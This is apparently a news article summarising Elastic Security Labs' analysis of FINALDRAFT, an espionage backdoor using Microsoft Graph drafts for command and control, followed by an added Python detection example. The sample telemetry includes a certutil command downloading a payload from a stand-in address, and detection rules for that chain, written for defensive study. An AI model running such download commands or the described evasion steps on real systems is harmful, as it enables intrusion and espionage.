Elastic Security Labs discovered a new form of malware during a recent investigation (REF7707) that uses Microsoft’s Graph API for data exfiltration and process injection.
The malware, called FINALDRAFT, appears to be part of an espionage campaign linked to China. It contains a customized loader and backdoor with extensive functionality, including command-and-control (C2) communication via Outlook.
Threat researchers have determined that this malware campaign targeted the foreign ministry of an undisclosed South American country. A telecommunications company and a university in Southeast Asia were also affected. The attacks, discovered in November 2024, are attributed to the REF7707 threat group.
Although the malware itself is highly sophisticated, the attackers were inconsistent in their evasion techniques and campaign management, which may indicate a less experienced but well-organized group.
Attack techniques and infection process
The initial access vector is still unknown, but researchers determined that Microsoft's certutil utility was used to download malicious files. These commands were executed via the Remote Shell plugin of Windows Remote Management (WinrsHost.exe), which indicates that the attackers already held valid network credentials and were able to move laterally within the infrastructure.
A key component of the attack is the deployment of PATHLOADER, an initial malware that executes encrypted shellcode. The final payload, FINALDRAFT, is then injected into the memory of a newly started mspaint.exe process, complicating detection. This is according to an analysis by The Hacker News.
Misuse of Microsoft Graph API
FINALDRAFT is written in C++ and functions as a full-featured remote administration tool. The malware reads commands from the Drafts folder of a compromised email account and writes the execution results into new draft emails. Because this traffic blends in with legitimate Microsoft 365 activity, traditional security solutions have difficulty detecting and blocking it.
With 37 built-in command handlers, FINALDRAFT offers various capabilities, including process injection, file manipulation and network proxy functionalities. Moreover, the malware can start new processes with stolen NTLM hashes and execute PowerShell commands without calling powershell.exe directly, bypassing detection via Event Tracing for Windows (ETW). Various API manipulation techniques are used for this purpose, including the use of PowerPick from the Empire post-exploitation toolkit.
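The two observations above that a defender can act on most directly are the infection chain (certutil launched under the WinRM remote shell host WinrsHost.exe, then a payload injected into a freshly started mspaint.exe) and the C2 channel (Microsoft Graph, driven from inside that injected host process). The following Python is an added example, not Elastic's or any vendor's detection content: it runs two simple rules over constructed Sysmon-style process-creation and network-connection records. The record field names, the PIDs, the 203.0.113.0/24 download address and the assumption that graph.microsoft.com is the Graph endpoint the injected process would reach are all constructed for the example; the parent/child relationship and the choice of mspaint.exe as the injection host come from the report.

```python
"""Detection logic for the REF7707 infection chain and Graph-based C2.

Added example, not Elastic's code. Events are constructed Sysmon-style
process-creation (EID 1) and network-connection (EID 3) records; field
names, PIDs and the 203.0.113.0/24 address are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    pid: int
    image: str
    command_line: str
    parent_image: str


@dataclass
class NetworkEvent:
    pid: int
    image: str
    dest_host: str
    dest_port: int


URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Processes that have no legitimate reason to talk to Microsoft Graph; the
# report names mspaint.exe as the process FINALDRAFT is injected into.
SUSPICIOUS_GRAPH_CLIENTS = {"mspaint.exe"}
GRAPH_HOST = "graph.microsoft.com"  # assumed Graph endpoint


def basename(path: str) -> str:
    """Case-insensitive file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect_winrm_certutil_download(events):
    """certutil started by WinRM's remote shell host with a download-style command."""
    hits = []
    for ev in events:
        if basename(ev.image) != "certutil.exe":
            continue
        if basename(ev.parent_image) != "winrshost.exe":
            continue
        cmd = ev.command_line.lower()
        if "-urlcache" in cmd or URL_RE.search(cmd):
            hits.append((ev.pid, "certutil download launched via WinRM remote shell"))
    return hits


def detect_unexpected_graph_client(net_events):
    """An injection host such as mspaint.exe opening a connection to Microsoft Graph."""
    hits = []
    for ne in net_events:
        if basename(ne.image) in SUSPICIOUS_GRAPH_CLIENTS and ne.dest_host.lower() == GRAPH_HOST:
            hits.append((ne.pid, f"{basename(ne.image)} connected to {GRAPH_HOST}:{ne.dest_port}"))
    return hits


def run_detections(proc_events, net_events):
    """Apply both rules and return (pid, reason) pairs in rule order."""
    return detect_winrm_certutil_download(proc_events) + detect_unexpected_graph_client(net_events)


# Constructed sample telemetry: one malicious chain plus benign look-alikes.
SAMPLE_PROCESS_EVENTS = [
    ProcessEvent(4012, r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://203.0.113.10/p.bin C:\Users\Public\p.bin",
                 r"C:\Windows\System32\WinrsHost.exe"),
    ProcessEvent(4020, r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -verify C:\certs\corp.cer",
                 r"C:\Windows\System32\cmd.exe"),  # benign local certificate check
    ProcessEvent(5120, r"C:\Windows\System32\mspaint.exe", "mspaint.exe",
                 r"C:\Windows\explorer.exe"),
]
SAMPLE_NETWORK_EVENTS = [
    NetworkEvent(5120, r"C:\Windows\System32\mspaint.exe", "graph.microsoft.com", 443),
    NetworkEvent(6000, r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
                 "graph.microsoft.com", 443),  # Outlook is an expected Graph client
]

if __name__ == "__main__":
    for pid, reason in run_detections(SAMPLE_PROCESS_EVENTS, SAMPLE_NETWORK_EVENTS):
        print(f"pid {pid}: {reason}")
```

Run against the sample telemetry, only the WinRM-spawned certutil (pid 4012) and the mspaint.exe connection to Graph (pid 5120) fire; the locally run certutil and Outlook's own Graph traffic do not. The second rule is deliberately narrow: it keys on the specific injection host the report describes rather than on Graph traffic in general, since Graph is used by a great deal of legitimate Microsoft 365 tooling.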
Linux variant
In addition to the Windows variant, a Linux version of FINALDRAFT has also been discovered. ELF binaries uploaded to VirusTotal from Brazil and the United States suggest that this variant has similar C2 functionality. This version also contains a mechanism to remove itself from the system, which the researchers read as part of an advanced persistence strategy.
The complexity and long development path of FINALDRAFT suggest that these tools have likely been in use for some time. Elastic Security Labs concludes that this malware campaign represents a well-organized and long-term espionage operation.